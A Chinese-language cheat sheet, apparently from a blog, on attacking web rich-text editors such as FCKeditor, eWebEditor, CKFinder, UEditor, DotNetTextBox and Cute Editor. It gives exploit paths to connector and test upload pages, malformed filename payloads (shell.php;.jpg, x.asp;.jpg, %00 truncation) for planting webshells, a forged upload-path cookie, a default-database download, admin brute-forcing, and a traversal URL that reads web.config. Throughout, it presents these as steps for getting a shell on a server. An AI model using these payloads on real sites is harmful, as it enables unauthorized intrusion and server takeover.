常见编辑器漏洞

编辑器利用

查找编辑器目录

  • 目录扫描
  • 目录遍历
  • 蜘蛛爬行          

漏洞利用

  • 百度相关编辑器漏洞利用

FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

  • FCKeditor编辑器页
  • FCKeditor/_samples/default.html
  • 查看编辑器版本
  • FCKeditor/_whatsnew.html
  • 查看文件上传路径
  • fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

查看上传目录

  • XML页面中第二行"url=/xxx"的部分就是默认基准上传路径
  • FCKeditror被动限制策略所导致的过滤不严问题
  • 影响版本:FCKeditor x.x <= FCKeditor v2.4.3

脆弱性描述

  • FCKeditor v2.4.3中File类别默认拒绝上传类型
  • html |htm| php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
  • pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
  • Fckeditor 2.0 <=2.2 允许上传asa、cer、php2、php4、inc、pwnl、pht后缀的文件
  • 上传后 它保存的文件直接用的$sFilePath =$sServerDir.$sFileName,而没有使用$sExtension为后缀
  • 直接导致在win下在上传文件后面加个.来突破
  • 而在apache下,因为"Apache文件名解析缺陷漏洞”也可以利用之

漏洞版本

  • windows有任意文件上传漏洞如x.asp;.jpg
  • Apache+linux环境下在上传文件后面加个.突破!测试通过

Version <=2.4.2 For php

在处理PHP在上传的地方并未对media类型进行进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址

action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:


FCKeditor 文件上传“.”变“_”下划线的绕过方法

  • 很多时候上传的文件例如: shell.php.rar 或者shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化
  • 提交shell.php+空格绕过
  • 不过空格只支持win系统*nix是不支持的[shell.php 和shell.php+空格是2个不同的文件 未测试
  • 继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制

突破建立文件夹

 

 FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp

FCKeditor中test文件的上传地址

  • FCKeditor/editor/filemanager/browser/default/connectors/test.html
  • FCKeditor/editor/filemanager/upload/test.html
  • FCKeditor/editor/filemanager/connectors/test.html
  • FCKeditor/editor/filemanager/connectors/uploadtest.html

绕过asp;.jpg变asp_jpg

  • 使用特殊名称绕过
  • a.aspx.a;.a.aspx.jpg..jpg.aspx
  • xx.asp.;.jpg

EWEbeditor

1.进后台   

  • 通过弱口令
  • 下载默认数据库   ewebeditor/db/ewebeditor.mdb
  • burp抓包爆破
  • 利用注入点得到密码

如果没有后台

利用目录遍历漏洞,找网站数据库位置下载网站数据库,登录网站后台拿shell

利用exp进行

构造上传

2.修改上传类型

3.自己添加上传样式以后添加上传按钮一一上传

CKFinder

任意文件上传漏洞

  • 其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞
  • 然后修改文件名
  • 1_php;1.jpg
  • 利用iis6.0目录解析漏洞拿shell
  • 创建目录/x.asp/
  • 在目录下上传图片马即可拿shell

南方数据编辑器southidceditor

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR

  • 利用ii6.0文件名解析漏洞
  • 上传图片改名为
  • x.php;20221.jpg获取shell

DotNetTextBox编辑器漏洞

  • 关键字:system_dntb/
  • 确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具
  • cookie:UserType=0;IsEdition=0;Info=1;
  • uploadFolder=../system_dntb/Upload/;
  • 路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞

PHPWEB网站管理系统后台Kedit编辑器

  • 两种利用方式
  • 第一种是利用iis6.0文件名解析漏洞
  • xx.php;xx.jpg
  • 第二种方式
  • %00截断
  • xx.php%00jpg

Cute Editor 在线编辑器本地包含漏洞

  • 影响版本:
  • Cute Editor For Net 6.4
  • 脆弱描述
  • 可以随意查看网站文件内容,危害较大
  • 攻击利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

等等编辑器漏洞,其余特殊编辑器漏洞,需要时可自行百度查找他们的漏洞

你可能感兴趣的:(编辑器漏洞总结)